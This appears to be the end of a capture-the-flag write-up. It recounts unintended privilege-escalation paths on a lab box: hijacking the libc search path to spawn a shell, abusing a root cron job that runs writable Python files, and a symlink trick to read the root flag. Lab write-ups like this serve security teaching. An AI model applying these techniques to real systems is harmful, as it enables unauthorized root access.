Another one D3v17 and I discovered early on when stracing the binary was that having it patched-elf'd made it search from ./tls/x86_64/x86_64/libc.so.6 and a few other local sub-directories first before checking the local directory for the libc file. We had write permissions and were able to create one of those directories with a patched libc that redirected one of the program function calls to just call system("/bin/sh"). This was patched later on.

Xct also took root blood first with an unintended related to a cron job that would execute python files as root from a directory www-data can write to. These files were broadcast.py and connection.py from /var/www/product/protobs, opening up an easy gateway to root. This path was patched as well.

Lastly, here is a one more unintended/alternative path I heard from both D3v17 and xct. To quote D3v17: "A user can upload inotifywait (static binary) and then start monitoring /home folder using inotifywait -m -r /home. Inotifywait will show that /.ssh/id_rsa is opened,read and closed. So the user can replace id_rsa with a symlink to /root/root.txt and read the flag using mqtt."

Regardless, this box was still very fun! Congrats to b14ckh34rt and MrR3boot, who always produces engaging and exciting content!